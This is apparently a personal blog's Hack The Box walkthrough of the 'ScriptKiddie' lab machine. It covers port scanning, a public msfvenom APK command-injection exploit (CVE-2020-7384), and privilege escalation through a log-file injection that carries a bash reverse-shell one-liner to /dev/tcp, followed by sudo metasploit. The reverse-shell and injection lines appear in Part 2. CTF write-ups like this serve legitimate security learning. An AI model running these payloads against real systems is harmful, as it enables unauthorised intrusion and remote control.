---
title: "Scriptkiddie Hackthebox"
date: 2021-04-08T01:25:25+02:00
draft: false
image: "/static/HACKING/scriptkiddie-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/scriptkiddie-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [PRIVILEGE ESCALATION](#-part-2---privesc)

# [+] BOX INFO 💻 :

```
Operative System : Linux 🐧
Difficulty : Easy 🌔
Owner : 0xdf
IP : 10.10.10.226
```

# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- --open -T5 -n 10.10.10.226](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+10.10.10.226)

```
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
```

Once seen open ports, let's get a deeper scan :

> [nmap -sV -sC -sS -p22,5000 10.10.10.226](https://explainshell.com/explain?cmd=nmap+-sV+-sC+-sS+-p22%2C5000+10.10.10.226)

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Let's check the website :

![<- Not working](/static/HACKING/scriptkiddie-1.png)

Hahaha "k1d'5 h4ck3r t00l5", let's try each tool : 

**nmap** -> 

![<- Not working](/static/HACKING/scriptkiddie-2.png)

This works fine...

**payloads** -> 

![<- Not working](/static/HACKING/scriptkiddie-3.png)

With that we can create different types of payloads for our system, it's using `msfvenom` as we can see here :

![<- Not working](/static/HACKING/scriptkiddie-4.png)

Let's search for a exploit for `msfvenom` :

![<- Not working](/static/HACKING/scriptkiddie-5.png)

There is an interest exploit, we can inject commands with an apk template, and as we saw we have the option of `apk` files :

![<- Not working](/static/HACKING/scriptkiddie-6.png)

But it didn't work for me (or I just didn't know how to do it), so let's search for a exploit in github, in my case I found [this one](https://github.com/nikhil1232/CVE-2020-7384), running **CVE-2020-7384.sh** we can setup our malicious**apk** file :

![<- Not working](/static/HACKING/scriptkiddie-7.png)

And now our apk file should be created :

![<- Not working](/static/HACKING/scriptkiddie-8.png)

Let's upload this file to the victim server, but first of all we have to start listening from our local machine with `netcat` :

### From our local machine :

> [rlwrap nc -lvnp 8989](https://explainshell.com/explain?cmd=rlwrap+nc+-lvnp+8989)

### From the victim browser : 

And as the end of **CVE-2020-7384.sh** said :

```
If you have access to the vulnerable machine then run:
msfvenom -x <your newly created apk> -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
```

Let's set the **LHOST to 127.0.0.1** and upload **exploit.apk** ->

![<- Not working](/static/HACKING/scriptkiddie-9.png)

Generate and let's see our netcat :

![<- Not working](/static/HACKING/scriptkiddie-10.png)

And we’re in 😎! To get a full interactive shell we can run this :

```
script /dev/null -c bash
export SHELL=bash
export TERM=xterm-256color
stty rows 62 columns 235
```

# [+] PART 2 - PRIVESC 

## [1] Escalating to Pwn

If we look inside `pwn` user's home directory we can see  a file called **scanlosers.sh** :

![<- Not working](/static/HACKING/scriptkiddie-11.png)

```sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```

This is actually vulnerable to **command injection**, we can inject commands to ${IP}, so we can turn a :


> [nmap --top-ports 10 -oN recon/10.10.10.10.nmap 10.10.10.10 2>&1 >/dev/null](https://explainshell.com/explain?cmd=nmap+--top-ports+10+-oN+recon%2F10.10.10.10.nmap+10.10.10.10+2%3E%261+%3E%2Fdev%2Fnull)

into a :

> [nmap --top-ports 10 -oN recon/ ;/bin/bash -c "bash -i >& /dev/tcp/10.10.14.21/1234 0>&1" #.nmap  ;/bin/bash -c "bash -i >& /dev/tcp/10.10.14.21/1234 0>&1" # 2>&1 >/dev/null](https://explainshell.com/explain?cmd=nmap+--top-ports+10+-oN+recon%2F+%3B%2Fbin%2Fbash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.21%2F1234+0%3E%261%22+%23.nmap++%3B%2Fbin%2Fbash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.21%2F1234+0%3E%261%22+%23+2%3E%261+%3E%2Fdev%2Fnull)

And then we'll get a reverse shell, as you can see we changed the whole meaning of the command. The script is reading $logs from `/home/kid/logs/hackers`, so we can add there the command :

> [echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/1234 0>&1' #" >> hackers](https://explainshell.com/explain?cmd=echo+%22++%3B%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.18%2F1234+0%3E%261%27+%23%22+%3E%3E+hackers)

But first of all let's listen from our local machine :

> [rlwrap nc -lvnp 1234](https://explainshell.com/explain?cmd=rlwrap+nc+-lvnp+1234)

![<- Not working](/static/HACKING/scriptkiddie-12.png)

Nice we're **Pwn** :sunglasses:!
 
## [1] Escalating to root

If we run `sudo -l` we can see this :

![<- Not working](/static/HACKING/scriptkiddie-13.png)

We can execute `metasploit` as root, so let's execute it with sudo and then spawn a bash :

![<- Not working](/static/HACKING/scriptkiddie-13.png)

# THANKS FOR READING 😊 !!























